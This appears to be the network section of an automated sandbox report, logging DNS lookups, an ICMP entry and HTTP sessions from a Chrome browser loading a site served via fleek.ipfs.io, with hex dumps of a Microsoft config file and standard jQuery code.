                                                                                Oct 12, 2023 17:42:11.119996071 CEST5221053192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:12.132320881 CEST5042053192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:12.132860899 CEST5284653192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:12.270000935 CEST53522101.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:12.406929970 CEST53592341.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:12.781696081 CEST53504201.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:13.242604971 CEST53528461.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:13.871849060 CEST5670253192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:13.872358084 CEST6281253192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:14.034523010 CEST53628121.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.034575939 CEST53567021.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.107646942 CEST6023253192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:14.112803936 CEST4988853192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:14.282722950 CEST53602321.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.286282063 CEST53498881.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.378496885 CEST5794653192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.378794909 CEST5721753192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.379439116 CEST5673253192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.379667997 CEST6034553192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.380716085 CEST6292853192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.381192923 CEST5378753192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.383774996 CEST6073653192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.384581089 CEST5891453192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:15.541219950 CEST53572171.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.541915894 CEST53579461.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.542037010 CEST53603451.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.542112112 CEST53567321.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.543016911 CEST53629281.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.544260025 CEST53537871.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.546212912 CEST53607361.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.547447920 CEST53589141.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.813044071 CEST53614251.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:16.963773966 CEST5838753192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:16.964440107 CEST6188753192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:17.137552977 CEST53618871.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:17.137976885 CEST53583871.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:18.190026999 CEST6536953192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:18.190732002 CEST5817453192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:18.353802919 CEST53653691.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:18.353984118 CEST53581741.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:18.355950117 CEST53567601.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:19.344887972 CEST53494271.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:21.606235981 CEST5828053192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:21.606618881 CEST6141653192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:21.770788908 CEST53614161.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:21.837416887 CEST53582801.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:27.953361988 CEST53515011.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:32.723351002 CEST138138192.168.2.4192.168.2.255
                                                                                Oct 12, 2023 17:42:47.361762047 CEST53637731.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:43:10.906891108 CEST53638131.1.1.1192.168.2.4
                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                Oct 12, 2023 17:42:12.781778097 CEST192.168.2.41.1.1.1c205(Port unreachable)Destination Unreachable
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 12, 2023 17:42:09.707952023 CEST192.168.2.41.1.1.10x252dStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.708233118 CEST192.168.2.41.1.1.10x2696Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.708664894 CEST192.168.2.41.1.1.10x2003Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.708945990 CEST192.168.2.41.1.1.10x7e18Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:11.119692087 CEST192.168.2.41.1.1.10x70Standard query (0)www.miglioremacchinadacucire.itA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:11.119996071 CEST192.168.2.41.1.1.10xb9eeStandard query (0)www.miglioremacchinadacucire.it65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:12.132320881 CEST192.168.2.41.1.1.10x979aStandard query (0)www.miglioremacchinadacucire.itA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:12.132860899 CEST192.168.2.41.1.1.10x1720Standard query (0)www.miglioremacchinadacucire.it65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:13.871849060 CEST192.168.2.41.1.1.10xeb78Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:13.872358084 CEST192.168.2.41.1.1.10x9c2fStandard query (0)www.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:14.107646942 CEST192.168.2.41.1.1.10xc7d0Standard query (0)fleek.ipfs.ioA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:14.112803936 CEST192.168.2.41.1.1.10x1fe2Standard query (0)fleek.ipfs.io65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.378496885 CEST192.168.2.41.1.1.10x3adStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.378794909 CEST192.168.2.41.1.1.10x5b32Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.379439116 CEST192.168.2.41.1.1.10x8063Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.379667997 CEST192.168.2.41.1.1.10x3d94Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.380716085 CEST192.168.2.41.1.1.10xde71Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.381192923 CEST192.168.2.41.1.1.10x28dfStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.383774996 CEST192.168.2.41.1.1.10xea3fStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.384581089 CEST192.168.2.41.1.1.10x525fStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:16.963773966 CEST192.168.2.41.1.1.10x3af7Standard query (0)ipfs.techA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:16.964440107 CEST192.168.2.41.1.1.10xe12dStandard query (0)ipfs.tech65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:18.190026999 CEST192.168.2.41.1.1.10xd93aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:18.190732002 CEST192.168.2.41.1.1.10x8ec6Standard query (0)www.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:21.606235981 CEST192.168.2.41.1.1.10xc218Standard query (0)www.freepngimg.comA (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:21.606618881 CEST192.168.2.41.1.1.10xaecaStandard query (0)www.freepngimg.com65IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 12, 2023 17:42:09.870333910 CEST1.1.1.1192.168.2.40x252dNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.870333910 CEST1.1.1.1192.168.2.40x252dNo error (0)clients.l.google.com172.217.14.78A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.870362043 CEST1.1.1.1192.168.2.40x2696No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:09.870592117 CEST1.1.1.1192.168.2.40x2003No error (0)accounts.google.com142.250.188.237A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:12.406929970 CEST1.1.1.1192.168.2.40x70No error (0)www.miglioremacchinadacucire.it217.61.57.241A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:12.781696081 CEST1.1.1.1192.168.2.40x979aNo error (0)www.miglioremacchinadacucire.it217.61.57.241A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:14.034523010 CEST1.1.1.1192.168.2.40x9c2fNo error (0)www.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:14.034575939 CEST1.1.1.1192.168.2.40xeb78No error (0)www.google.com142.250.188.228A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:14.282722950 CEST1.1.1.1192.168.2.40xc7d0No error (0)fleek.ipfs.io209.94.90.1A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.541915894 CEST1.1.1.1192.168.2.40x3adNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.541915894 CEST1.1.1.1192.168.2.40x3adNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.541915894 CEST1.1.1.1192.168.2.40x3adNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.541915894 CEST1.1.1.1192.168.2.40x3adNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.542037010 CEST1.1.1.1192.168.2.40x3d94No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.542112112 CEST1.1.1.1192.168.2.40x8063No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.542112112 CEST1.1.1.1192.168.2.40x8063No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.543016911 CEST1.1.1.1192.168.2.40xde71No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.543016911 CEST1.1.1.1192.168.2.40xde71No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.544260025 CEST1.1.1.1192.168.2.40x28dfNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.546212912 CEST1.1.1.1192.168.2.40xea3fNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.546212912 CEST1.1.1.1192.168.2.40xea3fNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:15.547447920 CEST1.1.1.1192.168.2.40x525fNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:17.137976885 CEST1.1.1.1192.168.2.40x3af7No error (0)ipfs.tech185.93.3.244A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:18.353802919 CEST1.1.1.1192.168.2.40xd93aNo error (0)www.google.com142.250.217.132A (IP address)IN (0x0001)false
                                                                                Oct 12, 2023 17:42:18.353984118 CEST1.1.1.1192.168.2.40x8ec6No error (0)www.google.com65IN (0x0001)false
                                                                                Oct 12, 2023 17:42:21.837416887 CEST1.1.1.1192.168.2.40xc218No error (0)www.freepngimg.com88.99.162.33A (IP address)IN (0x0001)false
                                                                                • fs.microsoft.com
                                                                                • clients2.google.com
                                                                                • accounts.google.com
                                                                                • www.miglioremacchinadacucire.it
                                                                                • https:
                                                                                  • fleek.ipfs.io
                                                                                  • cdnjs.cloudflare.com
                                                                                  • code.jquery.com
                                                                                  • maxcdn.bootstrapcdn.com
                                                                                  • stackpath.bootstrapcdn.com
                                                                                  • ipfs.tech
                                                                                  • www.google.com
                                                                                  • www.freepngimg.com
                                                                                • slscr.update.microsoft.com
                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.449743104.85.244.112443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:01 UTC0OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Encoding: identity
                                                                                User-Agent: Microsoft BITS/7.8
                                                                                Host: fs.microsoft.com
                                                                                2023-10-12 15:42:01 UTC0INHTTP/1.1 200 OK
                                                                                ApiVersion: Distribute 1.1
                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                Server: ECAcc (sac/2578)
                                                                                X-CID: 11
                                                                                Cache-Control: public, max-age=164233
                                                                                Date: Thu, 12 Oct 2023 15:42:01 GMT
                                                                                Connection: close
                                                                                X-CID: 2


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.449744104.85.244.112443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:02 UTC0OUTGET /fs/windows/config.json HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Encoding: identity
                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                Range: bytes=0-2147483646
                                                                                User-Agent: Microsoft BITS/7.8
                                                                                Host: fs.microsoft.com
                                                                                2023-10-12 15:42:02 UTC0INHTTP/1.1 200 OK
                                                                                Content-Type: application/octet-stream
                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                ApiVersion: Distribute 1.1
                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                X-Azure-Ref: 0Fz4RYwAAAACZW8dCTzveR7lI76J6Z2l5U0pDRURHRTA1MTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                Cache-Control: public, max-age=164232
                                                                                Date: Thu, 12 Oct 2023 15:42:02 GMT
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                X-CID: 2
                                                                                2023-10-12 15:42:02 UTC1INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                10192.168.2.449757104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:15 UTC689OUTGET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1
                                                                                Host: cdnjs.cloudflare.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                11192.168.2.449754151.101.2.137443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:15 UTC690OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                                                                Host: code.jquery.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                12192.168.2.449755151.101.2.137443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:15 UTC690OUTGET /jquery-3.3.1.slim.min.js HTTP/1.1
                                                                                Host: code.jquery.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                13192.168.2.449756151.101.2.137443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:15 UTC691OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                Host: code.jquery.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                14151.101.2.137443192.168.2.449755C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC691INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 69917
                                                                                Server: nginx
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                ETag: "28feccc0-1111d"
                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                Access-Control-Allow-Origin: *
                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                Accept-Ranges: bytes
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Age: 1838788
                                                                                X-Served-By: cache-lga21982-LGA, cache-sna10724-LGB
                                                                                X-Cache: HIT, HIT
                                                                                X-Cache-Hits: 3383, 1
                                                                                X-Timer: S1697125336.167490,VS0,VE2
                                                                                Vary: Accept-Encoding
                                                                                2023-10-12 15:42:16 UTC721INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                Data Ascii: /*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                2023-10-12 15:42:16 UTC768INData Raw: 3d 74 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 28 62 2d 3d 69 29 3d 3d 3d 72 7c 7c 62 25 72 3d 3d 30 26 26 62 2f 72 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 3d 72 2e 70 73 65 75 64 6f 73 5b 65 5d 7c 7c 72 2e 73 65 74 46 69 6c 74 65 72 73 5b 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 6f 65 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 65 29 3b 72 65 74 75 72 6e 20 69 5b 78 5d 3f 69 28 74 29 3a 69 2e 6c 65 6e 67 74 68 3e 31 3f 28 6e 3d 5b 65 2c 65 2c 22 22 2c 74 5d 2c 72 2e 73 65 74 46 69 6c 74 65 72 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 75 65 28 66 75 6e 63 74 69 6f 6e 28 65
                                                                                Data Ascii: =t))break;return(b-=i)===r||b%r==0&&b/r>=0}}},PSEUDO:function(e,t){var n,i=r.pseudos[e]||r.setFilters[e.toLowerCase()]||oe.error("unsupported pseudo: "+e);return i[x]?i(t):i.length>1?(n=[e,e,"",t],r.setFilters.hasOwnProperty(e.toLowerCase())?ue(function(e
                                                                                2023-10-12 15:42:16 UTC814INData Raw: 74 79 28 65 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 74 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 74 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 3d 74 68 69 73 2e 63 61 63 68 65 28 65 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 69 5b 51 28 74 29 5d 3d 6e 3b 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 74 29 69 5b 51 28 72 29 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 69 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 3f 74 68 69 73 2e 63 61 63 68 65 28 65 29 3a 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 26 26 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 5b 51 28 74 29 5d 7d 2c 61 63
                                                                                Data Ascii: ty(e,this.expando,{value:t,configurable:!0}))),t},set:function(e,t,n){var r,i=this.cache(e);if("string"==typeof t)i[Q(t)]=n;else for(r in t)i[Q(r)]=t[r];return i},get:function(e,t){return void 0===t?this.cache(e):e[this.expando]&&e[this.expando][Q(t)]},ac
                                                                                2023-10-12 15:42:16 UTC864INData Raw: 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 74 3d 71 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e
                                                                                Data Ascii: .appendChild(e)})},prepend:function(){return Re(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=qe(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return Re(this,arguments,function(e){this.parentN
                                                                                2023-10-12 15:42:16 UTC881INData Raw: 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 68 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 72 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 63 72 65 61 74 65 48 54 4d 4c 44 6f 63 75 6d 65 6e 74 28 22 22 29 2e 62 6f 64 79 3b 72 65 74 75 72 6e 20 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 66 6f 72 6d 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 3e 3c 2f 66 6f 72 6d 3e 22 2c 32 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 7d 28 29 2c 77 2e 70 61 72 73 65 48 54 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                                Data Ascii: n(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},h.createHTMLDocument=function(){var e=r.implementation.createHTMLDocument("").body;return e.innerHTML="<form></form><form></form>",2===e.childNodes.length}(),w.parseHTML=function(e,t


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                15104.17.24.14443192.168.2.449757C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC692INHTTP/1.1 200 OK
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
